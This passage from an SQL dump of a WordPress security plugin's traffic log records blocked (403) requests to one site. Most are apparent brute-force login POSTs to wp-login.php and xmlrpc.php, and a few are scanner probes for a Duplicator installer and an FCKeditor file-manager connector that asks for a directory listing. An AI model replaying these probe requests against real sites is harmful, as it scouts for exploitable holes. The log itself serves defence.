Safari\\/537.36\"}','vQa53CWL2Gq9zNZFODnlmwBA',0,1666282922.4106,19118,'','POST',403,0,600,0,1,'',0),('35.187.58.136',599472776,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','yhV1Er3DW0zPLqjIemugMGQR',0,1666284858.5703,18520,'','POST',403,0,600,0,1,'',0),('20.169.38.5',346629637,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','Dn9O1SZjAW2ovsIQmkTJF0Xp',0,1666292363.6221,4483,'','POST',403,0,600,0,1,'',0),('138.68.140.0',2319748096,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','yu8kSlpRzY36tJ7g1aZEwP5o',0,1666292356.4301,12390,'','POST',403,0,600,0,1,'',0),('20.169.38.5',346629637,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','NxXv5qLG8VQywaiYgFMJZk94',0,1666290765.0487,537,'','POST',403,0,600,0,1,'',0),('187.32.211.193',3139490753,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','2OG1VDIo3cmuNWY9igZB7XQ6',0,1666286766.4063,1186,'','POST',403,0,600,0,1,'',0),('159.89.228.214',2673468630,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','GLg60H3kWCEs5nQyh2qAR94a',0,1666288650.3513,1266,'','POST',403,0,600,0,1,'',0),('171.244.0.91',2884894811,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','xckpFf7vjhNlaEPwIiSbTt4K',0,1666290521.3298,1231,'','POST',403,0,600,0,1,'',0),('20.169.38.5',346629637,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','7J2qMSTonHzIserGmRUWZYPy',0,1666295897.1540,483,'','POST',403,0,600,0,1,'',0),('20.169.38.5',346629637,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','UTA3MsteL2gxl4JoDrEy1Kdu',0,1666294115.8501,17678,'','POST',403,0,600,0,1,'',0),('34.69.109.132',574975364,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','Ze0CFn5JWxXVpNgu623AmEGo',0,1666294197.0700,1291,'','POST',403,0,600,0,1,'',0),('20.169.38.5',346629637,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','RHLW1P5plbM43x2Gh90XUQKI',0,1666299578.0828,1316,'','POST',403,0,600,0,1,'',0),('188.166.61.228',3165011428,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','7fuRaszl2BZvkStdmD1i9IqY',0,1666297893.0288,2252,'','POST',403,0,600,0,1,'',0),('20.169.38.5',346629637,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','S2KoHjN9VOfE5W7CU1lhmqzF',0,1666297709.8644,18576,'','POST',403,0,600,0,1,'',0),('159.89.199.237',2673461229,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','xk7gNJoHS2AjWt5sePL0XVay',0,1666296022.5739,1459,'','POST',403,0,600,0,1,'',0),('20.169.38.5',346629637,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','dB1qVZ5L4S6rhW2Tn0oDiJK8',0,1666301442.5317,18510,'','POST',403,0,600,0,1,'',0),('103.147.241.56',1737748792,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','a90CncHZmoTbu45qUPRyNEGW',0,1666301578.7239,11685,'','POST',403,0,600,0,1,'',0),('143.244.177.220',2415178204,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','Y06OryXHxgjavKh5VGw4mS7Z',0,1666299741.2791,476,'','POST',403,0,600,0,1,'',0),('92.204.138.28',1556908572,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','5WAr8xZFSpKGwHUVv4Jo7tnm',0,1666305317.7872,1218,'','POST',403,0,600,0,1,'',0),('20.169.38.5',346629637,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','ph7lfX4jnEbtUirasexZ5w3O',0,1666303351.1454,15383,'','POST',403,0,600,0,1,'',0),('20.169.38.5',346629637,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','ylEOgBD7QsiAZWov6TV2UjuM',0,1666305248.5108,19468,'','POST',403,0,600,0,1,'',0),('20.169.38.5',346629637,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','DsgCuAxcYrh2RbjMQOLVBzvH',0,1666307091.9453,7030,'','POST',403,0,600,0,1,'',0),('77.240.13.186',1307577786,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','s9QXupCA4tLUIP7qY3GDvxOd',0,1666307191.9247,1517,'','POST',403,0,600,0,1,'',0),('103.133.133.193',1736803777,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','O538kiPfEvNrHgF9GSwYRJlt',0,1663715930.6995,509,'','POST',403,0,600,0,1,'',0),('103.133.133.193',1736803777,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','DS8m7zFGhjuE6otJbnKr4aCe',0,1663715932.2046,522,'','POST',403,0,600,0,1,'',0),('167.172.142.236',2813103852,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','mxRGCObQByziAhEV1ZIawtsj',0,1663716331.6342,10469,'','POST',403,0,600,0,1,'',0),('212.110.92.155',3564002459,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','BgyDhjLUckbNVYCiGSKevafw',0,1663716324.9283,17178,'','POST',403,0,600,0,1,'',0),('162.240.28.177',2733644977,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','DLamgUs2V0xIpcT1JXCR8SWn',0,1663717716.9151,1569,'','POST',403,0,600,0,1,'',0),('139.59.85.224',2335921632,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','x0D2CYkspn8ryZNoijl3eIAu',0,1663717713.7569,5046,'','POST',403,0,600,0,1,'',0),('23.88.33.176',391651760,'','http://cteisys.com/dup-installer/main.installer.php','','{\"1\":\"\"}','EdGRq6PL1b7uZXgA03jzIShU',0,1663718126.4580,6784,'','GET',403,0,700,0,1,'',0),('104.131.68.19',1753433107,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','40gmNqY78VFyLBJowrDK65cz',0,1663719118.2081,4813,'','POST',403,0,600,0,1,'',0),('103.166.183.192',1738979264,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','2FsiE8eSNzo1OL4aKW3hXtG7',0,1663719115.8368,8100,'','POST',403,0,600,0,1,'',0),('88.99.133.202',1482917322,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','Mxgz962RJeETq0rV4sWvLnUK',0,1663719184.0924,510,'','POST',403,0,600,0,1,'',0),('88.99.133.202',1482917322,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','vyln7EbYpoSC4RsrFaTNtMw1',0,1663719185.5336,482,'','POST',403,0,600,0,1,'',0),('167.172.168.111',2813110383,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','4gi6bqrSUXtl5OmN2P8zY1EJ',0,1663720507.2660,1490,'','POST',403,0,600,0,1,'',0),('168.119.80.254',2826391806,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','evAuk9l4QGp0XibE2UDPnrzW',0,1663720515.5491,592,'','POST',403,0,600,0,1,'',0),('181.174.125.214',3048111574,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','Z0TsgVLG38F1NrUwmAHycOvt',0,1663721914.5324,1297,'','POST',403,0,600,0,1,'',0),('106.52.120.186',1781823674,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','CyPcmUle0oBFzO69K4bQL2En',0,1663721918.4591,473,'','POST',403,0,600,0,1,'',0),('213.152.161.85',3583549781,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Egb68hP0BwQeYU3W5tlNIouM',0,1663722144.8866,2678,'','POST',403,0,515,0,1,'',0),('167.71.141.164',2806484388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','urNjLte7BUiX24zVsGydoPqM',0,1663723322.7653,11540,'','POST',403,0,600,0,1,'',0),('106.15.38.206',1779377870,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','c193MBFiJa8CDHVSRyqPWpEU',0,1663723333.1421,1183,'','POST',403,0,600,0,1,'',0),('104.254.90.251',1761499899,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','7AWpnbjoXKEutwxcm1iNQyFh',0,1663724112.5749,3369,'','POST',403,0,515,0,1,'',0),('77.68.15.224',1296306144,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','zTsW3ekO7bmh4juUQxZwvXD0',0,1663724291.9261,630,'','POST',403,0,600,0,1,'',0),('77.68.15.224',1296306144,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','sYQPL1jrwnCHe8UVJyTvBkgp',0,1663724293.3989,572,'','POST',403,0,600,0,1,'',0),('142.93.201.0',2388510976,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','kCPEpA0jVJ8yw9aWvnuDtd3X',0,1663724749.4642,17313,'','POST',403,0,600,0,1,'',0),('85.91.237.106',1432087914,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','Cyrxa8qoUpBNZcFR157S0Ok4',0,1663724756.1711,11391,'','POST',403,0,600,0,1,'',0),('128.199.14.4',2160528900,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','7XRCsiVNx253rB4aylPTpLKW',0,1663726177.1308,1482,'','POST',403,0,600,0,1,'',0),('165.22.109.42',2769710378,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','BqLs1QXFoUaJp7d53zbNRK49',0,1663726186.0763,1301,'','POST',403,0,600,0,1,'',0),('51.15.183.168',856668072,'','http://cteisys.com/mambots/editors/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/75.0.3770.100 Safari\\/537.36\"}','DgewMhYSBnyj9OPN6mAX3KiI',0,1663727226.2482,10940,'','GET',403,0,700,0,1,'',0),('161.35.126.102',2703457894,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','sSY4pHjWM9tmr7qFdKcfAw3v',0,1663727606.0186,6418,'','POST',403,0,600,0,1,'',0),('91.249.163.48',1543086896,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','2tjUkVLRPWeGfnDq3YO1lKuX',0,1663727615.0123,478,'','POST',403,0,600,0,1,'',0),('213.152.186.19',3583556115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','HwGUkSNbDOp8CrL24xYzPQeI',0,1663728259.0223,18869,'','POST',403,0,515,0,1,'',0),('37.120.217.243',628677107,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','WjBfDlFnPoIpHAJsuz4i9g5k',0,1663729031.4748,1279,'','POST',403,0,515,0,1,'',0),('167.172.168.111',2813110383,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','g84QDV9RHim5N7BwcnyKpMP2',0,1663729037.4338,509,'','POST',403,0,600,0,1,'',0),('120.78.15.126',2018381694,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','bDVRBjt5cG2EnCySlQIKqzfY',0,1663729047.1544,486,'','POST',403,0,600,0,1,'',0),('47.111.116.44',795833388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','yqgmlACk9ZrSc0vOQ5nJ7f8d',0,1663730489.4067,1128,'','POST',403,0,600,0,1,'',0),('47.105.73.13',795429133,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','u3Ec5mKdr96qXWgxAUiFPTlt',0,1663730489.3089,2126,'','POST',403,0,600,0,1,'',0),('178.217.190.82',3000614482,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','XZMa14EALe7HVF6vuTpm0bdB',0,1663731906.0552,3194,'','POST',403,0,600,0,1,'',0),('103.130.218.189',1736628925,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','6QbwTCkLKxzhvsUHISfRjpdn',0,1663731914.4335,460,'','POST',403,0,600,0,1,'',0),('119.237.81.29',2012041501,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','b7HFy43osR0SJu8YvmeZ26fM',0,1663733330.1461,8011,'','POST',403,0,600,0,1,'',0),('81.88.52.8',1364734984,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','A6iy7tmcR8TOBXsJF4IQvHau',0,1663733320.0176,18946,'','POST',403,0,600,0,1,'',0),('72.167.34.14',1218912782,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','puZWLPc28KT3Ck7nlVsXMy49',0,1663734709.3533,8662,'','POST',403,0,600,0,1,'',0);
INSERT INTO `cerber_traffic` VALUES ('35.187.58.136',599472776,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','ZnX2i6M391rfQNoTDhLlcV78',0,1663734718.7367,445,'','POST',403,0,600,0,1,'',0),('178.211.58.145',3000187537,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','FMigeUIm7nyTszj0KqB1rWAx',0,1663734958.4367,499,'','POST',403,0,600,0,1,'',0),('178.211.58.145',3000187537,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','N0e8pDLJn2oiXaf4qtdrwS7x',0,1663734960.0722,476,'','POST',403,0,600,0,1,'',0),('157.245.110.251',2650107643,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','ChsWSAYq0UeDaTrxyLiF7R3k',0,1663736100.4702,1241,'','POST',403,0,600,0,1,'',0),('185.12.109.223',3104599519,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','JxT4HdwUY5gZIzX71fakOoV9',0,1663737210.0373,529,'','POST',403,0,600,0,1,'',0),('185.12.109.223',3104599519,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','fuKIGU8Ee0jdoFQwWRXTZ9AY',0,1663737211.7906,507,'','POST',403,0,600,0,1,'',0),('51.91.151.60',861640508,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','OCjrdkVf6uLMFl7Qyn9zXq24',0,1663737443.4794,575,'','POST',403,0,600,0,1,'',0),('133.130.103.36',2239915812,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','Cnzi52qcFAkf4XUuG79yLPgr',0,1663738788.4679,4665,'','POST',403,0,600,0,1,'',0),('77.240.13.186',1307577786,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','oGHrTdByqvWk9XLnpa4tYwzu',0,1663738796.9331,464,'','POST',403,0,600,0,1,'',0),('199.249.230.37',3355043365,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','HXsPzNf2uEl8GFZVIhOy0LK6',0,1663738917.0444,2442,'','POST',403,0,515,0,1,'',0),('125.227.127.195',2112061379,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','cJ6l4LimTdWBN5UFnwAIHPqX',0,1663740123.9201,15795,'','POST',403,0,600,0,1,'',0),('166.62.125.246',2789113334,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','jtAxn0rW8lLec6CbRoskHXU5',0,1663740121.0111,18772,'','POST',403,0,600,0,1,'',0),('176.53.62.61',2956279357,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','U2CiyznrQ6blFc7JkmSEvwPI',0,1663740818.5170,463,'','POST',403,0,600,0,1,'',0),('176.53.62.61',2956279357,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','JQF8rceh12jyLUOSCgxK5vVX',0,1663740820.2133,473,'','POST',403,0,600,0,1,'',0),('213.152.161.30',3583549726,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','2Q0mbnshtFp5DwGNLA1dOy6K',0,1663741206.7691,20496,'','POST',403,0,515,0,1,'',0),('51.38.192.91',858177627,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','1CKvfeUQAcWhGBt3qk2LSr9E',0,1663741461.4107,17770,'','POST',403,0,600,0,1,'',0),('185.2.4.33',3103917089,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','vKVJ2Egr9BxpDlXoyHw6SMuL',0,1663741470.4254,8764,'','POST',403,0,600,0,1,'',0),('213.152.187.225',3583556577,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','xNK6wRJtoj413sBSYVkazuW5',0,1663741842.5303,20374,'','POST',403,0,515,0,1,'',0),('94.231.86.20',1592219156,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','TpkNvB4aJ5l3FRhyCrmAOLjM',0,1663742810.6980,17825,'','POST',403,0,600,0,1,'',0),('47.96.74.105',794839657,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','sF3EepiJ9PqHSU4CZIbmzNg6',0,1663742820.9982,7526,'','POST',403,0,600,0,1,'',0),('147.182.249.22',2478242070,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','HRCZc5sePkDdbfiFrQvTu2LX',0,1663744163.3601,17841,'','POST',403,0,600,0,1,'',0),('188.166.61.228',3165011428,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','CwFH4kEpsfWVzShlb0MDxILP',0,1663744171.9121,9289,'','POST',403,0,600,0,1,'',0),('148.72.214.245',2487801589,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 